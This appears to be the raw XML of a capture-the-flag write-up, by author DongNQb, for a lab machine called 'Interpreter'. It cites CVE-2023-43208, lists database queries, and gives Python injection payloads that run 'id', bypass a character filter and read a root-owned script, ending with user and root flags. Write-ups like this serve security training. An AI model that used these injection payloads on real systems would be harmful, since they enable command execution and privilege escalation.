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594" w:rsidRDefault="00354737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00354737">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354737" w:rsidRPr="00354737" w:rsidRDefault="00354737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354737" w:rsidRDefault="003547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C0305D" wp14:editId="1C6B005B">
            <wp:extent cx="5943600" cy="1922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37" w:rsidRDefault="00BD4D37" w:rsidP="003547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="00354737" w:rsidRPr="00BD4D37">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>CVE-2023-43208</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0018329D" w:rsidRDefault="0018329D" w:rsidP="0018329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8329D" w:rsidRDefault="0018329D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96A1C2" wp14:editId="5A264714">
            <wp:extent cx="5276190" cy="123809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29D" w:rsidRDefault="00815199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0C1AD9" wp14:editId="59E6255A">
            <wp:extent cx="5943600" cy="4351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199" w:rsidRDefault="00815199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183E7A" wp14:editId="38B6CD5F">
            <wp:extent cx="5943600" cy="318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199" w:rsidRDefault="00F06759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CDB619" wp14:editId="3BD074FF">
            <wp:extent cx="4514286" cy="904762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59" w:rsidRDefault="00F06759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515613" wp14:editId="7E9CC2C9">
            <wp:extent cx="5943600" cy="41948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59" w:rsidRDefault="00F06759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9A40A7" wp14:editId="040A7346">
            <wp:extent cx="5943600" cy="2366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25" w:rsidRDefault="00F41225" w:rsidP="0018329D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F41225" w:rsidRDefault="00F41225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SELECT * FROM CHANNEL;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41225" w:rsidRDefault="00F41225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A5950A" wp14:editId="79A8AE69">
            <wp:extent cx="5943600" cy="3365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25" w:rsidRDefault="00F41225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69A8FA" wp14:editId="0772DF83">
            <wp:extent cx="4057143" cy="2323809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25" w:rsidRPr="0018329D" w:rsidRDefault="00F41225" w:rsidP="001832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925FEB" wp14:editId="674A1C0C">
            <wp:extent cx="4066667" cy="3523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37" w:rsidRDefault="00354737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F41225" w:rsidRDefault="00F41225">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41225">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SELECT * FROM CODE_TEMPLATE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41225" w:rsidRDefault="00C961C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19D599" wp14:editId="5BD7E06C">
            <wp:extent cx="4819048" cy="380000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D37" w:rsidRDefault="00BD4D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7CBB61" wp14:editId="57DDA973">
            <wp:extent cx="5943600" cy="23583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1C4" w:rsidRDefault="00C961C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DA66A5" wp14:editId="2BD12E31">
            <wp:extent cx="2838095" cy="1390476"/>
            <wp:effectExtent l="0" t="0" r="63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1C4" w:rsidRDefault="00C961C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00354737" w:rsidRDefault="00CE5FB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5992D0" wp14:editId="0F6D7C9D">
            <wp:extent cx="5142857" cy="3895238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3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E41" w:rsidRDefault="00E52E4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C8C963" wp14:editId="256C463A">
            <wp:extent cx="5807488" cy="219456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6570" cy="220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B0" w:rsidRDefault="00E52E4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585033" wp14:editId="7D982592">
            <wp:extent cx="5494955" cy="2318918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6957" cy="232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E41" w:rsidRDefault="00E52E41" w:rsidP="00E52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52E41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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E52E41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E52E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2E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52E41" w:rsidRPr="00E52E41" w:rsidRDefault="00E52E41" w:rsidP="00E52E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Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{__import__("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E52E41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E52E41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E52E4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52E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E52E41">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>("id").read()}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E52E41" w:rsidRDefault="00E52E41" w:rsidP="00E52E4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D89D35" wp14:editId="0FFA50C8">
            <wp:extent cx="5457775" cy="2414016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9137" cy="243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0D" w:rsidRDefault="0040730D" w:rsidP="00407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Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040730D" w:rsidRDefault="0040730D" w:rsidP="0040730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3FFD4F" wp14:editId="30A4EEA7">
            <wp:extent cx="5943600" cy="24320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0D" w:rsidRDefault="008C6901" w:rsidP="00407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Byp</w:t>
      </w:r>
      <w:r w:rsidRPr="008C6901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ass “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C6901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8C69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6901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6901" w:rsidRDefault="00944169" w:rsidP="008C69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DE7386" wp14:editId="4370A6FA">
            <wp:extent cx="5943600" cy="37515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901" w:rsidRPr="008C6901" w:rsidRDefault="008C6901" w:rsidP="008C69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6901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Flag root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6901" w:rsidRDefault="00944169" w:rsidP="008C69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456A36" wp14:editId="21D28FEE">
            <wp:extent cx="5484357" cy="3335731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7090" cy="333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169" w:rsidRPr="00BD4D37" w:rsidRDefault="008C6901" w:rsidP="009441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6901">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Flag user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00944169" w:rsidRPr="00944169" w:rsidRDefault="00944169" w:rsidP="00944169">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00944169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{__import__("os").popen("cat"+chr(32)+"/usr/local/bin/notif.py"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00944169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).read</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00944169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>()}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00637AAA" w:rsidRPr="00637AAA" w:rsidRDefault="00944169" w:rsidP="00637A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410B7A" wp14:editId="44803A79">
            <wp:extent cx="5658193" cy="4052621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1580" cy="406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AAA" w:rsidRPr="00637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82CEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="370C4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95DDA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="915885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37"/>
    <w:rsid w:val="00024594"/>
    <w:rsid w:val="0018329D"/>
    <w:rsid w:val="00354737"/>
    <w:rsid w:val="0040730D"/>
    <w:rsid w:val="00637AAA"/>
    <w:rsid w:val="00815199"/>
    <w:rsid w:val="008C6901"/>
    <w:rsid w:val="00944169"/>
    <w:rsid w:val="00AE7B17"/>
    <w:rsid w:val="00BD4D37"/>
    <w:rsid w:val="00C961C4"/>
    <w:rsid w:val="00CE5FB0"/>
    <w:rsid w:val="00E51550"/>
    <w:rsid w:val="00E52E41"/>
    <w:rsid w:val="00F06759"/>
    <w:rsid w:val="00F4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4B14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FF9CC512-192C-4DCD-86C1-D9D60E70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7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4D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K3ysTr0K3R/CVE-2023-43208-EXPLOIT.gi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8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DongNQb</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DongNQb</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-26T02:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-27T07:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>